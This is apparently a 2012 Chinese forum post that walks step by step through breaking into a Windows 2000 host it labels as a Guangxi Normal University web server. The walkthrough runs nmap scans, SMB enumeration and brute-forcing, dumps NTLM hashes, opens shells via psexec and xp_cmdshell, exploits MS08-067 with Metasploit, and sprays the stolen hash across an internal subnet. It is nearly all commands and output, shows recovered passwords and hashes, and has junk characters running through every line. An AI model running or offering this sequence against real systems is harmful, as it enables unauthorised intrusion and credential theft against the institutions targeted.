广西师范网站http://202.103.242.241/
7 _5 W: `1 F9 }( T3 s( P. L) d A$ { m9 g! p
root@bt:~# nmap -sS -sV 202.103.242.2412 v& o j j, ^5 c7 Z* y) s
2 W0 K. m" z( n. E! L' {
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST; |# K0 b- _2 o# O2 ~* Y
9 O" R$ D0 ^6 m) D1 s$ X
Nmap scan report for bogon (202.103.242.241). ?/ }/ m. u. _) u9 P
$ D/ P Z- z7 w8 G7 A- ~5 O$ H
Host is up (0.00048s latency).
/ ~& {. a; D' a3 o, Q# c- Z1 V
# @4 O" b1 T3 |1 \; @& _Not shown: 993 closed ports% J7 b0 L% Q" W) F c* j
8 C) |, u3 s; Y$ BPORT STATE SERVICE VERSION+ Y* P9 _; {, j# v2 R" z
2 |) L/ X9 a) s8 x, Z
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)5 I0 b& j3 @% y2 F
5 h7 K2 z/ X" U6 @
139/tcp open netbios-ssn% x+ H$ d3 k- g4 _% M# Z& r+ T/ `
& E: t1 ~9 U. q, O
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds7 E$ m* }; g; f
# I( @) d5 M2 q# ]) o' S
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 l: z6 W* u) {' r, V3 O7 j1 b: k
) R7 S2 f4 |- d1 S0 D
1026/tcp open msrpc Microsoft Windows RPC2 p- Z# b. |3 d2 E
/ A0 O" c s2 F8 I
3372/tcp open msdtc?8 I# Z0 M: i' z+ ~! e# r
, C' M5 Y( j5 r3389/tcp open ms-term-serv?& ~- F& G( X- z+ Z4 A
2 M! J6 C3 q4 T6 P( s6 D, ^ M% q
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
% S& d3 _' f7 z3 e& wSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
) L& c4 R/ {' G& ?$ _& z
: L/ N f/ c$ c! m' n4 _3 H: HSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions& D) G* A c+ h: ~/ q: N0 p
6 F" n7 ]/ w8 `3 l q
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)- o& g8 {/ ^+ n( S% d
. P; k0 P: C, S" [
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO$ @% }& W5 a+ [2 w& E
G) f3 _, L! c7 ~7 i+ X0 E
SF:ptions,6,”hO\n\x000Z”);9 G2 ^6 V" i2 c
- u+ |0 s( h( ~
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 \" k; g2 A! G" c+ O
2 c1 f) }: f! }& BService Info: OS: Windows2 a/ F: b* ]* s' d. F3 p
' P6 }9 i. o. b4 f+ @
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
, g* {* G; @7 n+ y! }5 q# B3 F: C+ Z7 \- F- R, J
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds: D! z8 N! n7 o9 U
, `6 G' [) q% U# L `
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本7 V& M" Y5 p* ?. i4 n
6 N, D+ v! d$ N& U( R
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse, k) c, ]& q4 P1 T- w7 X5 s
+ H! t6 f U6 S
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
( K: v* x4 g- B% D6 ^$ a" M/ v
. p9 P# L. b9 G) O-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
. @4 a$ _' V* g6 G2 q+ S- b# P3 @
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse, z' X! | o* H1 Y! b" H! E
( x' j1 I4 n! e( G* K0 T$ C
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse U6 e' F! w: _* d! M7 I
! B6 ^, e6 L- Y+ h D" x
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
8 w1 u5 u' d$ | h' Y @9 Z' U% @4 D! h9 e5 n) g
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
l1 O/ h7 F) C& v( S
' d0 ^3 X- r8 Q2 a- W) g5 F+ t1 a-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
2 m+ F$ i6 x9 g7 M, l# t3 n" i) _8 P8 T/ I4 r- _5 ~- P7 [/ N
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
U3 i7 _' S) T; M
6 E% K! ]0 m& U$ P-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse3 S9 ^+ ~$ m) G% N+ g
. v0 _2 f: Y# z
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse; ~/ k3 o7 ^+ c4 b( C
' s* `' d: T/ t% U! Q
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" n1 |/ K; \( S6 I: w! A3 X
7 [' ] H7 A: I% r+ w& O" X( h-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse, F0 I0 y' G' ~4 x- f+ q7 T
9 G1 q1 Z1 k5 S-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse/ R1 a. C$ ~5 Z% f
6 e2 ^! s# ^- w# }/ H* B5 S2 f-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse5 @# ^! Z" v' i
. g7 a2 t5 U( h2 o# g" |8 Eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
3 j+ @. A6 M' P' v: B8 G' i
: h: D2 `0 u) Q: P//此乃使用脚本扫描远程机器所存在的账户名 K% }% J7 u9 @; g
5 U+ N3 G0 a! r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST* s1 f- l6 J6 | V0 n
: C* b" {# |, C+ z9 m
Nmap scan report for bogon (202.103.242.241)- d& u- H4 P* x" p' W2 O* Q, B3 c, ]; M
; W. g8 S% |0 ?* }Host is up (0.00038s latency).1 _+ x5 [. e' b% }, T+ H: L6 v) P
! L$ i" v" l9 ~- F jNot shown: 993 closed ports
4 T1 V) O2 n: O4 E# R
0 |0 Y: R# s3 E) d$ zPORT STATE SERVICE
% z3 h$ \( F5 X' q2 l
1 \; ]6 K/ B8 p# a7 p* t) N$ A. c" q$ m( s135/tcp open msrpc. l! c$ f" S! n2 M" p8 U3 K
/ ]+ g/ a" J# s/ D139/tcp open netbios-ssn
* A7 S0 w% o/ p. b& @ n+ Q( s% P x! ]
445/tcp open microsoft-ds, | _% N3 l; C% x. h7 D4 _
u7 ]9 i& D. R& z% L
1025/tcp open NFS-or-IIS: s: k7 W. R+ \
% [* V5 b* q; Q) F5 v- l1026/tcp open LSA-or-nterm* n/ Y' V+ P9 ?' y1 [' a
9 s! J" ?: I# x, S6 k
3372/tcp open msdtc5 M6 i+ z) H0 r5 Y( }
: D T% g( r5 v
3389/tcp open ms-term-serv
# P8 u/ {, x4 B& V' I- ]% D& q; ^2 |' N
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! ^. t& J! H5 e
9 E! Z% i% l: O& D4 r3 r
Host script results:
. ^9 @8 K8 u0 j) m- u$ C1 j1 E/ L
2 r$ H! ~, p+ J Y# x1 `7 z| smb-enum-users:9 L% i G7 ^6 ` u+ `/ s. @" ^
) o) X; g6 o% M+ }8 }|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
; s- ?% a, c! a7 r1 P) W9 @
0 n0 [$ w0 d' ?* I" @8 eNmap done: 1 IP address (1 host up) scanned in 1.09 seconds$ X' U! r( J* o9 N$ I
9 v, G) c# z: ?# d* F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 U" @ J) u2 X" O+ x: D$ u- k
3 |$ S. K8 S( C4 s4 s P) ^
//查看共享
6 i' f* C7 l& M( A/ J, D% M# k, E) R* a9 q3 ?! S& `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
3 C# j# h( h8 \9 w0 H" y8 P, R3 ^# D
Nmap scan report for bogon (202.103.242.241)
5 V. v! ]0 ^$ J/ a T3 i! P W6 }* i$ _& u" G1 E! a
Host is up (0.00035s latency).4 }, E0 U# u. G
u' u; ? ?4 E+ W. Z; N% { N
Not shown: 993 closed ports& j9 T% _% e; F: j: L; K
$ q5 E" O- g) s8 k! [
PORT STATE SERVICE
: a, k9 R( j/ n& H2 K( Y' M( O& K6 w: D+ ]
135/tcp open msrpc
$ b s$ a2 l G( T. z7 X5 }. |/ P! z0 d }' ]9 J
139/tcp open netbios-ssn
5 Y! }+ E0 E* u) Z# m [3 @/ c3 l1 g7 s. `2 r, l6 q2 R0 {' l
445/tcp open microsoft-ds
! S* ^3 Y) U. _1 E
& B# p1 z" F0 k7 d* V/ b1025/tcp open NFS-or-IIS
7 N5 y% }# o* \& [5 {) b$ \9 b6 G( K6 ]2 F- d! e- n' R
1026/tcp open LSA-or-nterm
% v" c& J6 R% _* C3 e
7 F0 F o7 I! S$ b" t8 }* j3372/tcp open msdtc
6 u/ G' {( g& U5 r" \$ k4 p) m9 b! I& e3 J, k. n8 W0 g4 L
3389/tcp open ms-term-serv
, R' O8 p4 S" D8 \4 e0 m6 P) M/ U0 {- `2 H, S, z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" K) j; \: B0 F5 k7 \! ] |2 m" N, D6 t( r2 G1 s
Host script results:
; K, K: s. R8 k- `
4 l5 z# |! [% [0 b/ C| smb-enum-shares:
9 b' k* M, x% D" T' p
( ]% x. |$ i9 M* D| ADMIN$
5 g9 m3 @1 b/ s/ p+ X1 o1 T4 l$ ~
& ^0 `+ M0 v& [; m4 w| Anonymous access: <none>% T/ l) ~% Y" p5 [- D
$ g; ^% e# c1 _( || C$& U; g' A; I) H% }) Q' J
" w- `8 U2 c7 n# t# k" p9 P! n| Anonymous access: <none>
: Q; r6 u, P, W# z/ c# u, |$ M8 d
| IPC$
- h/ H c2 |5 ~* D& n5 E. b+ ^0 m
+ }0 o# T; b- [8 v8 d|_ Anonymous access: READ
: C. ~+ m. {5 O) ~3 K; I4 O
; s, n4 K; x3 S7 R$ p" C) O0 KNmap done: 1 IP address (1 host up) scanned in 1.05 seconds1 \4 l" @7 k9 H7 l# D
; V& F7 \! ^, ]: |
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ! l0 F( J% E5 I. G
& s' r7 G: n' c. R7 J" j//获取用户密码
! D- c7 O% q% d- d$ W% r4 z8 u) p
0 _. o; k, ^( M- BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
% Q$ Y) ?) _- ?6 [
5 b2 [9 P6 K+ z9 b; ?2 V3 ^Nmap scan report for bogon (202.103.242.2418)
6 ~* R6 g! b. b; o6 R T8 E: U2 u
Host is up (0.00041s latency).
O6 v# s) D, _ U" D7 W# k3 X) Y
Not shown: 993 closed ports
+ r5 m+ N u$ l; Q1 [2 j2 i5 e
9 B- U; w2 {; r% BPORT STATE SERVICE+ W9 r+ r+ T( p4 a6 o1 h6 O
4 e6 Y5 i9 X+ V6 s4 F \
135/tcp open msrpc
6 {" T; q# ]6 s6 M
. C3 G* |# N' s ~# @4 F139/tcp open netbios-ssn
1 e' k* [/ S) d d# V
m) G; {5 L- L; C# F445/tcp open microsoft-ds
$ Q' `3 z8 _9 B
9 `! t/ S. a8 u4 i4 v4 m1025/tcp open NFS-or-IIS8 M9 O3 x4 }9 }) U, n6 C
" o; b, z( H/ ~
1026/tcp open LSA-or-nterm' u- H0 n" ~5 v0 x' i( Q
4 i: U+ x. `0 I9 k3372/tcp open msdtc
% Q# H, \4 _+ L# ~2 K: g" B3 K4 l& H/ a9 W M
3389/tcp open ms-term-serv
( R: O" X5 _; E$ J6 ~1 o. L
7 W* z5 D l0 E, K$ s6 D0 A2 pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ Y/ k- s: ]6 [; B, D" h* @
1 r+ b, m. |4 J- ^! r7 N
Host script results:
% T; A7 |4 }8 u
/ S- O5 y& l! J! A6 o| smb-brute:
# R: n/ \* w; a( y5 @0 s, v6 d8 ~0 y" A# ~, `/ n2 E
administrator:<blank> => Login was successful
! V5 B3 ?( c) g+ Z; I G* c3 ?, L; R3 d& F6 D% n6 v
|_ test:123456 => Login was successful
0 h- b" x; H% J) y+ z; o. \0 y6 J- u! r# J* k3 N1 L* D
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds* B/ H {6 K, U3 h
0 P0 ^8 D% }; I$ x9 ^
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
: W9 I+ c$ j" v+ f% C( N7 `" k3 S, L4 r! V5 i
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data+ j! I% ~. c) S: _
: Q. K# \: k; Q* a5 x% ?# proot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
2 g% A% D- {7 x3 P$ u: q/ v+ |! B5 X. C' L
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139# Y0 g1 Z2 s# m0 l7 g
. y! O( `7 Y q# u8 e) U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
2 ?+ d) ?0 P* J0 h/ y. W
: _. N. i. V# \& k3 k2 F) wNmap scan report for bogon (202.103.242.241)! ]& n5 Y8 C2 h$ F% z5 R+ D
% x; O7 T. K' DHost is up (0.0012s latency).( A( W* o+ J2 o- z% o6 Y
& r6 d# A& n% h7 QPORT STATE SERVICE( {3 p p# ]0 Z8 l% F. P
7 R( G4 M+ I& o b7 n/ E135/tcp open msrpc# i5 H1 {! M, P: a8 W& f/ r" U" F
8 P4 E: @8 `* h& j, V" H4 B# M139/tcp open netbios-ssn
' r. I: r( |" z: \
, l" i0 Z6 ^6 R# q! ]. Y445/tcp open microsoft-ds
) ^. p! E# O- m& k
7 S/ s6 R, F' H- P6 U% F$ dMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 [0 w+ S. Q- C7 b n' g
+ g/ }' V9 Z, @" U# g3 P0 pHost script results:
3 h7 H0 y8 Y* ^. z, a: C/ ^
/ p) i; s9 a: B* p7 F| smb-pwdump:
' F" b2 T- o, k- F2 ?
; v% _7 L+ D$ A/ m9 J| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
. V% b4 M T$ s" d
8 s- E% m( t! r0 J| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
( r+ {" V1 i# X/ q4 g. R2 c' q/ M# [2 R. y7 \
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ M9 e0 P. V' d; V, c
$ t4 a B3 R. q: t
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2/ O; ], e- ]; X, d
2 l9 L z" o! h! K( g! JNmap done: 1 IP address (1 host up) scanned in 1.85 seconds6 E: m5 a# s8 h1 p8 z
! o V; w- r, ?C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell/ B8 f4 Z" n7 j
# ^3 I9 Q: Y; A9 H: \. o
-p 123456 -e cmd.exe/ Q% _2 b# d, Y/ V6 Z
2 f; @, r! O+ P' c: I6 V( h
PsExec v1.55 – Execute processes remotely7 \9 _* l6 d1 F) @
% ?4 G: t& Q# K$ SCopyright (C) 2001-2004 Mark Russinovich# J' K) `; Z9 A
" T" w9 |6 k' G; u1 xSysinternals – www.sysinternals.com: B C( B( e+ n) T0 q1 `; J+ @
9 R2 c. _* e. e& h0 F% D
Microsoft Windows 2000 [Version 5.00.2195]. h( t; A$ i/ D& t% C; R- m8 D' P7 \
& Q& V, t [* u( X. f4 B(C) 版权所有 1985-2000 Microsoft Corp.
6 g" J k _- S! s! w! Y6 t- T
6 g! \; g. o. Z( K) ]+ d, JC:\WINNT\system32>ipconfig- W8 d8 ^ d& G* w$ e6 X
+ Z# x8 ] W k1 w" @
Windows 2000 IP Configuration
/ A# ~& |/ T. t) F3 F3 S- G7 p# C7 p4 o& A) s9 o
Ethernet adapter 本地连接:
: T9 g+ ]: m6 h. L7 X1 Q6 i% {7 y7 u J* M
Connection-specific DNS Suffix . :
1 k) S% N4 F- S2 P
# ~" U9 c6 U, q& {: \% EIP Address. . . . . . . . . . . . : 202.103.242.241
, `& v9 B; P- s$ V# {7 G# Y& f+ B" u5 F! p9 [/ K9 W
Subnet Mask . . . . . . . . . . . : 255.255.255.0) k/ @, E/ L0 E+ j+ `
! _: G/ a! o8 M" W! HDefault Gateway . . . . . . . . . : 202.103.1.1
* l" g4 q- m- g7 L. f2 I1 y/ x9 w; o2 ^. c& z$ m
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令& C: g- D" n; Z G! [( A
6 L% e& K! v# K* k% M1 jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
6 ^" z" V: }) x7 r; @& ?( {
/ R0 q( s$ b) D4 ~2 UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST0 P7 N, [2 y7 i9 \7 j" V
) q+ d {! x% T" O% g' f1 v
Nmap scan report for bogon (202.103.242.241)* i) m. H$ p8 {0 `
5 ^) T- B! E6 n5 n P& n
Host is up (0.00046s latency).1 p$ a( k3 x$ h" ^8 ^4 N% A
$ `8 o! v* u& f* N- RNot shown: 993 closed ports3 J% p8 u/ _3 b" F
3 z* l/ ?' p. I* J1 m
PORT STATE SERVICE, c1 d, }$ P3 B2 o9 i. [* z) c
$ V) X! v3 O$ ?. W135/tcp open msrpc
' J! s% R. y1 Y, _, u
$ p b8 D/ P/ A! U- `/ r$ B$ t( B139/tcp open netbios-ssn
4 b/ r# k. D/ _ j$ s( a1 G. |. H" P( H6 A
445/tcp open microsoft-ds
, a7 p5 e8 t. ?1 F% ^' \% e+ D2 [5 z7 [1 l3 b Q+ @2 X
1025/tcp open NFS-or-IIS
6 F9 q( ~: L" V6 }( x- }+ p1 O* G; I/ |# Q" @& _ |* ~
1026/tcp open LSA-or-nterm" H, L: C$ e7 l0 `( @8 a4 h4 Y
. z# v% Q1 Q: w3 X1 v, b
3372/tcp open msdtc+ }* @0 l: ?" p! F6 a; N! v
' X$ |/ Z6 b! V: ^" {8 `6 x3389/tcp open ms-term-serv( I, C: N# x8 \+ Q
! p6 |5 j# |% J+ _% Q5 e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- c" m7 m, z6 G
8 ?4 x+ m. [( LHost script results:
. T5 u, W2 C: a8 g1 ^# H, B& J5 t" P6 M' D! j7 _2 d) A6 w/ e
| smb-check-vulns:
+ T0 {+ r( A$ R
! e2 Z: a/ V# K$ A|_ MS08-067: VULNERABLE$ K1 W! T- J# B3 O
' n0 J2 b+ X9 }4 @4 v' CNmap done: 1 IP address (1 host up) scanned in 1.43 seconds' u! I9 K, `6 r* l3 `
% [9 m: l5 `, n R: z+ Yroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
: J) @" Q, e7 m% m& W8 T; e8 V: l
msf > search ms089 h! i& Y5 x8 @7 G4 u& A
/ ~, A9 z$ C @9 _, F1 E8 w
msf > use exploit/windows/smb/ms08_067_netapi0 D! \* P: D4 Z) m* r) y, D7 c; W
4 {* r+ Y' D( }, x; F/ {( Y
msf exploit(ms08_067_netapi) > show options/ r& d, E3 ?) X: l5 v
7 I2 r* }2 e, {. y( ?$ K+ p
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241& H! ]# ?' F" U9 o( C
3 T V& I! V) R @, Q2 ` y+ |7 S r6 Y \msf exploit(ms08_067_netapi) > show payloads2 l& B& r: \, n* x9 `, U4 N
7 K3 w' j$ W4 v& }7 Q$ q; smsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp3 [1 ?/ _8 N+ M1 |! o6 G
# L( R5 ^. _- ?2 k1 K( M5 a
msf exploit(ms08_067_netapi) > exploit% v( y2 K" L* l6 L8 O! A9 c Q r2 K
2 j7 h1 f9 l/ R% w2 Q0 Bmeterpreter >
! S' l5 @- I# O! B" l9 y; b h1 \7 c9 l5 A- ]9 d
Background session 2? [y/N] (ctrl+z)& n1 x% `# `/ T. g9 ?2 ?% ?
0 c' \, `6 ^( M2 Bmsf exploit(ms08_067_netapi) > sessions -l! v$ X; z: i2 Z$ L/ x
2 J) X" o2 k; u( w7 s/ `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt( j2 f' c9 K- }1 Z- d
' B/ P2 H5 I6 X+ l7 N5 l+ p! ptest
% j2 r* {5 u6 y3 h7 p q
% [' X5 d* `2 S6 B" c- ?1 Ladministrator/ [8 U& I% N9 [& `& d# `7 D
4 Z4 U% r8 a3 X$ K# \
root@bt:/usr/local/share/nmap/scripts# vim password.txt1 b- }+ @$ R9 V* x \1 `9 p+ b
5 L& C& j& q! t& V44EFCE164AB921CAAAD3B435B51404EE6 I) L' \: S; i; j
' J8 |! E$ T+ E3 e" T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 - p! S" d1 D# y
& L/ H4 q6 |& H' w6 [1 Q //利用用户名跟获取的hash尝试对整段内网进行登录
1 z; |' }9 v6 M: y# U5 E; J+ @4 _
5 [! W4 f" ~/ y+ A; TNmap scan report for 192.168.1.105# u l9 j0 s7 h# I. r
1 ^7 u) D0 `5 w6 _# Z
Host is up (0.00088s latency).* y6 i" o$ L- C* x' b N$ E
" g7 A9 m# o8 P" _$ i& e% _! UNot shown: 993 closed ports
! l' I# R2 _- @& s2 }6 l2 @; M$ R$ H% Q# a7 _' u
PORT STATE SERVICE* z/ Z9 m8 s+ m- Q/ z* y* j# S
9 t3 Y7 Q8 }+ p! Y& O+ h5 m4 w
135/tcp open msrpc/ |, v3 c. W2 F6 d" g
% A p/ l/ [% }1 Y# a139/tcp open netbios-ssn$ A. l- X3 X: {$ R8 N. V/ A
; R: V B# Q$ o( g4 j( h% g
445/tcp open microsoft-ds, x2 J% u* a+ ^ E. u( d: y4 x
5 D+ s0 Z6 M1 _0 \" I: {; M
1025/tcp open NFS-or-IIS
& B. o& p, W% b. v8 C6 w
1 j5 O: d! x' d& b1026/tcp open LSA-or-nterm0 I, y9 {! X E6 o- z5 H
" {* M" U" F! ] c6 P- k. t3372/tcp open msdtc6 Z0 H4 `! u( Z/ z% M2 w9 }: R3 j
/ U$ h# X/ g/ T" x5 a6 u! E' K3389/tcp open ms-term-serv
8 }0 ]* H7 w! O7 b; }0 e* ^( }, v
$ G* m& k0 s ^2 H. H) X+ }* bMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 w2 p3 B2 r- a' |! m* w4 O
6 H% ~5 h! R1 \6 x, I
Host script results:
1 n) M6 D7 W" e% _3 n6 Q
" L8 w4 k5 W7 ]* Y. j" w1 X| smb-brute:
0 r+ E8 n5 h4 F' v. _; o& C2 q1 `1 a, [1 U, U' G: A4 s
|_ administrator:<blank> => Login was successful
. d8 |9 z- O( \& Z
! R' ^; o9 w9 @. Y* c8 N2 }# D攻击成功,一个简单的msf+nmap攻击~~·
* L; c9 k! i$ c4 T
0 \' T9 a0 W: h" W: I3 s& x |
发表于 2012-12-4 12:46:42
收藏
支持
反对